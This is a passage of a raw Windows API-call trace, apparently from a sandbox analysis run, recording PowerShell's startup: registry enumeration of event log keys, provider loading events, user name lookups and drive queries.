	[0837.029] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x2, lpName=0x283d90, lpcchName=0x12d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.029] CoTaskMemFree (pv=0x283d90) 
	[0837.029] CoTaskMemFree (pv=0x0) 
	[0837.029] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0837.029] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x3, lpName=0x283d90, lpcchName=0x12d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.029] CoTaskMemFree (pv=0x283d90) 
	[0837.029] CoTaskMemFree (pv=0x0) 
	[0837.029] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0837.029] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x4, lpName=0x283d90, lpcchName=0x12d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.029] CoTaskMemFree (pv=0x283d90) 
	[0837.029] CoTaskMemFree (pv=0x0) 
	[0837.033] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0837.033] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x5, lpName=0x283d90, lpcchName=0x12d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.034] CoTaskMemFree (pv=0x283d90) 
	[0837.034] CoTaskMemFree (pv=0x0) 
	[0837.034] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0837.034] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x6, lpName=0x283d90, lpcchName=0x12d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.034] CoTaskMemFree (pv=0x283d90) 
	[0837.034] CoTaskMemFree (pv=0x0) 
	[0837.034] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0837.034] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x7, lpName=0x283d90, lpcchName=0x12d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.034] CoTaskMemFree (pv=0x283d90) 
	[0837.034] CoTaskMemFree (pv=0x0) 
	[0837.034] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0837.034] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x8, lpName=0x283d90, lpcchName=0x12d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.034] CoTaskMemFree (pv=0x283d90) 
	[0837.035] CoTaskMemFree (pv=0x0) 
	[0837.035] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x360) returned 0x0
	[0837.035] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x0) returned 0x2
	[0837.035] RegOpenKeyExW (in: hKey=0x380, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x384) returned 0x0
	[0837.035] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x0) returned 0x2
	[0837.035] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x388) returned 0x0
	[0837.035] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x0) returned 0x2
	[0837.035] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x38c) returned 0x0
	[0837.035] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x0) returned 0x2
	[0837.036] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x390) returned 0x0
	[0837.036] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x0) returned 0x2
	[0837.036] RegOpenKeyExW (in: hKey=0x380, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x394) returned 0x0
	[0837.036] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x0) returned 0x2
	[0837.036] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x398) returned 0x0
	[0837.036] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x0) returned 0x2
	[0837.038] RegOpenKeyExW (in: hKey=0x380, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x39c) returned 0x0
	[0837.038] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x0) returned 0x2
	[0837.038] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x3a0) returned 0x0
	[0837.038] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x3a4) returned 0x0
	[0837.041] RegCloseKey (hKey=0x3a4) returned 0x0
	[0837.041] RegCloseKey (hKey=0x380) returned 0x0
	[0837.042] RegCloseKey (hKey=0x3a0) returned 0x0
	[0838.903] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1ba20008
	[0839.459] ReportEventW (hEventLog=0x1ba20008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ffcb60*="WSMan", lpRawData=0x2ffc8d0) returned 1
	[0839.469] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0839.469] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0839.469] CoTaskMemFree (pv=0x2a6660) 
	[0839.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0839.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0839.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0839.471] CoTaskMemAlloc (cb=0x804) returned 0x1b864860
	[0839.472] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b864860, nSize=0x12d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d8e8) returned 0x1
	[0839.472] CoTaskMemFree (pv=0x1b864860) 
	[0839.472] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0839.472] GetUserNameW (in: lpBuffer=0x283d90, pcbBuffer=0x12d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d928) returned 1
	[0839.472] CoTaskMemFree (pv=0x283d90) 
	[0839.473] ReportEventW (hEventLog=0x1ba20008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3002098*="Alias", lpRawData=0x3001e28) returned 1
	[0839.482] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0839.482] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0839.482] CoTaskMemFree (pv=0x2a6660) 
	[0839.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0839.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0839.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0839.485] CoTaskMemAlloc (cb=0x804) returned 0x1b864860
	[0839.485] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b864860, nSize=0x12d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d8e8) returned 0x1
	[0839.485] CoTaskMemFree (pv=0x1b864860) 
	[0839.485] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0839.485] GetUserNameW (in: lpBuffer=0x283d90, pcbBuffer=0x12d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d928) returned 1
	[0839.485] CoTaskMemFree (pv=0x283d90) 
	[0839.486] ReportEventW (hEventLog=0x1ba20008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3007690*="Environment", lpRawData=0x3007420) returned 1
	[0839.502] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0839.502] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0839.502] CoTaskMemFree (pv=0x2a6660) 
	[0839.503] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0839.503] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0839.503] CoTaskMemFree (pv=0x2a6660) 
	[0839.503] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0839.503] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0839.503] CoTaskMemFree (pv=0x2a6660) 
	[0839.504] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x12d490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0839.504] SetErrorMode (uMode=0x1) returned 0x1
	[0839.504] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x12d6a0 | out: lpFileInformation=0x12d6a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0839.504] SetErrorMode (uMode=0x1) returned 0x1
	[0839.506] GetLogicalDrives () returned 0x4
	[0839.507] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d200, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0839.508] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0839.508] SetErrorMode (uMode=0x1) returned 0x1
	[0839.509] CoTaskMemAlloc (cb=0x68) returned 0x1b849740
	[0839.509] CoTaskMemAlloc (cb=0x68) returned 0x1b849580
	[0839.509] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b849740, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x12d670, lpMaximumComponentLength=0x12d66c, lpFileSystemFlags=0x12d668, lpFileSystemNameBuffer=0x1b849580, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12d670*=0x9c354b42, lpMaximumComponentLength=0x12d66c*=0xff, lpFileSystemFlags=0x12d668*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0839.509] CoTaskMemFree (pv=0x1b849740) 
	[0839.509] CoTaskMemFree (pv=0x1b849580) 
	[0839.509] SetErrorMode (uMode=0x1) returned 0x1
	[0839.509] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0839.510] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0839.511] SetErrorMode (uMode=0x1) returned 0x1
	[0839.511] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d610 | out: lpFileInformation=0x12d610*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0839.511] SetErrorMode (uMode=0x1) returned 0x1
	[0839.511] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0839.511] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0839.511] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0839.511] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0839.512] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0839.512] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0839.512] SetErrorMode (uMode=0x1) returned 0x1
	[0839.512] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d440 | out: lpFileInformation=0x12d440*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0839.513] SetErrorMode (uMode=0x1) returned 0x1
	[0839.513] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0839.513] SetErrorMode (uMode=0x1) returned 0x1
	[0839.513] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d440 | out: lpFileInformation=0x12d440*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0839.513] SetErrorMode (uMode=0x1) returned 0x1
	[0839.513] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d280, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0839.513] SetErrorMode (uMode=0x1) returned 0x1
	[0839.513] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d4e0 | out: lpFileInformation=0x12d4e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0839.513] SetErrorMode (uMode=0x1) returned 0x1
	[0839.514] CoTaskMemAlloc (cb=0x804) returned 0x1b864860
	[0839.514] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b864860, nSize=0x12d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d8e8) returned 0x1
	[0839.514] CoTaskMemFree (pv=0x1b864860) 
	[0839.514] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0839.514] GetUserNameW (in: lpBuffer=0x283d90, pcbBuffer=0x12d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d928) returned 1
	[0839.514] CoTaskMemFree (pv=0x283d90) 
	[0839.515] ReportEventW (hEventLog=0x1ba20008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x300e780*="FileSystem", lpRawData=0x300e510) returned 1
	[0839.522] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0839.522] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0839.522] CoTaskMemFree (pv=0x2a6660) 
	[0839.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0839.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0839.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0839.524] CoTaskMemAlloc (cb=0x804) returned 0x1b864860
	[0839.524] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b864860, nSize=0x12d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d8e8) returned 0x1
	[0839.526] CoTaskMemFree (pv=0x1b864860) 
	[0839.526] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0839.526] GetUserNameW (in: lpBuffer=0x283d90, pcbBuffer=0x12d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d928) returned 1
	[0839.526] CoTaskMemFree (pv=0x283d90) 
	[0839.526] ReportEventW (hEventLog=0x1ba20008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3013fc0*="Function", lpRawData=0x3013d50) returned 1
	[0839.574] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0839.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0839.574] CoTaskMemFree (pv=0x2a6660) 
	[0839.593] CoTaskMemAlloc (cb=0x804) returned 0x1b864860
	[0839.593] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b864860, nSize=0x12d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d8e8) returned 0x1
	[0839.594] CoTaskMemFree (pv=0x1b864860) 
	[0839.594] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0839.594] GetUserNameW (in: lpBuffer=0x283d90, pcbBuffer=0x12d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d928) returned 1
	[0839.594] CoTaskMemFree (pv=0x283d90) 
	[0839.594] ReportEventW (hEventLog=0x1ba20008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30367e8*="Registry", lpRawData=0x3036578) returned 1
	[0839.631] CoTaskMemAlloc (cb=0x804) returned 0x1b864860
	[0839.631] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b864860, nSize=0x12d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d8e8) returned 0x1
	[0839.632] CoTaskMemFree (pv=0x1b864860) 
	[0839.632] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0839.632] GetUserNameW (in: lpBuffer=0x283d90, pcbBuffer=0x12d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d928) returned 1
	[0839.632] CoTaskMemFree (pv=0x283d90) 
	[0839.632] ReportEventW (hEventLog=0x1ba20008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x303bc00*="Variable", lpRawData=0x303b990) returned 1
	[0839.634] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0839.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0839.634] CoTaskMemFree (pv=0x2a6660) 
	[0839.635] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0839.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0839.635] CoTaskMemFree (pv=0x2a6660) 
	[0845.321] CoTaskMemAlloc (cb=0x804) returned 0x1b864860
	[0845.321] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b864860, nSize=0x12d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d8e8) returned 0x1
	[0845.322] CoTaskMemFree (pv=0x1b864860) 
	[0845.322] CoTaskMemAlloc (cb=0x204) returned 0x283d90
	[0845.322] GetUserNameW (in: lpBuffer=0x283d90, pcbBuffer=0x12d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d928) returned 1
	[0845.323] CoTaskMemFree (pv=0x283d90) 
	[0845.323] ReportEventW (hEventLog=0x1ba20008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x304f818*="Certificate", lpRawData=0x304f5a8) returned 1
	[0846.311] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0846.311] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0846.311] CoTaskMemFree (pv=0x2a6660) 
	[0846.315] GetLogicalDrives () returned 0x4
	[0846.316] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d570, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0846.316] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0846.317] CoTaskMemAlloc (cb=0x20e) returned 0x278860
	[0846.317] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x278860 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0846.317] CoTaskMemFree (pv=0x278860) 
	[0846.318] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0846.319] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0846.319] CoTaskMemFree (pv=0x2a6660) 
	[0846.319] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0846.319] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0846.319] CoTaskMemFree (pv=0x2a6660) 
	[0846.338] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0846.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0846.338] CoTaskMemFree (pv=0x2a6660) 
	[0846.340] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0846.340] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0846.340] CoTaskMemFree (pv=0x2a6660) 
	[0846.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0846.340] SetErrorMode (uMode=0x1) returned 0x1
